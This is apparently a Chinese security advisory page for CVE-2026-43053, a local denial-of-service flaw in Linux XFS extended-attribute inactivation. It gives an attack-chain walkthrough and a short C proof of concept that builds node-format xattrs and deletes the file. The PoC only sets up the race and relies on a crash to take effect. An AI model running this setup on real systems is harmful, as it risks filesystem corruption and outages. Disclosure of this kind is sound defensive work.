CVE-2026-43053 CVSS 4.7 中危

CVE-2026-43053 Linux内核XFS文件系统崩溃漏洞

披露日期: 2026-05-01

来源: 416baaa9-dc9f-4396-8d5f-8c081fb06d67

漏洞信息

漏洞编号

CVE-2026-43053

漏洞类型

拒绝服务

CVSS评分

4.7 中危

攻击向量

本地 (AV:L)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Linux Kernel

漏洞概述

Linux内核XFS文件系统在停用节点格式扩展属性inode时存在逻辑缺陷。当系统在取消子块和截断属性映射之间崩溃时，日志恢复无法正确处理元数据，导致下次挂载时触发验证失败和系统崩溃。

技术细节

该漏洞源于XFS文件系统在处理扩展属性去激活时的竞态条件。函数`xfs_attr3_node_inactive`在使子块失效时未立即从父节点移除条目，假设后续截断会处理。若在日志关闭发生于子块取消提交后、映射截断前，恢复时将保留映射但丢失子块。再次挂载时，系统尝试读取根节点及其指向的无效子块，因数据已被清零或未重放，导致`xfs_da3_node_read_verify`检测到元数据损坏，进而引发XFS文件系统强制卸载和拒绝服务。

攻击链分析

STEP 1

1. 触发条件准备

本地低权限用户创建文件并向其添加大量扩展属性，迫使XFS将属性存储结构从叶格式转换为节点格式。

STEP 2

2. 引发去激活

用户删除该文件或触发inode去激活操作，系统开始执行`xfs_attr3_node_inactive`流程。

STEP 3

3. 竞态窗口崩溃

在系统使子块失效但尚未提交属性映射截断的瞬间，发生系统崩溃或断电。

STEP 4

4. 日志恢复

系统重启并执行XFS日志恢复。此时保留了属性映射但子块可能被清零或未重放。

STEP 5

5. 元数据验证失败

系统尝试读取根节点及子块，发现指向无效数据（全零缓冲区），触发元数据I/O错误。

STEP 6

6. 拒绝服务

XFS检测到不可恢复的元数据损坏，强制文件系统只读或卸载，导致系统崩溃或服务不可用。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#include <stdio.h>
#include <stdlib.h>
#include <sys/xattr.h>
#include <unistd.h>

/*
 * PoC for CVE-2026-43053
 * This script creates a file with enough extended attributes
 * to force the XFS B-tree into 'node' format.
 * Deleting the file triggers the inactivation process.
 * Exploitation requires a system crash during the inactivation window.
 */

int main() {
    const char *filename = "poc_xfs_file.txt";
    FILE *fp = fopen(filename, "w");
    if (!fp) {
        perror("Failed to create file");
        return 1;
    }
    fclose(fp);

    // Add many attributes to trigger node format (btree split)
    char name[32];
    char value[4] = "val";
    for (int i = 0; i < 1000; i++) {
        snprintf(name, sizeof(name), "user.attr%d", i);
        if (setxattr(filename, name, value, 3, 0) != 0) {
            // Might fail due to limits, but enough is usually reached before
            // perror("setxattr");
        }
    }

    printf("File with node-format xattrs created. Triggering inactivation...\n");
    
    // Deleting the file triggers xfs_attr_inactive -> xfs_attr3_node_inactive
    unlink(filename);
    
    // Ensure data is written to disk to set up the crash scenario
    sync();

    printf("PoC setup complete. A crash during the window would exploit the vulnerability.\n");
    return 0;
}

影响范围

Linux Kernel (主要稳定版本，具体需参照修复提交)

防御指南

临时缓解措施

建议立即升级Linux内核以修复该漏洞。若暂时无法升级，应确保关键业务数据有备份，并尽量维持系统运行稳定性，避免在文件系统负载高时进行非正常关机。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表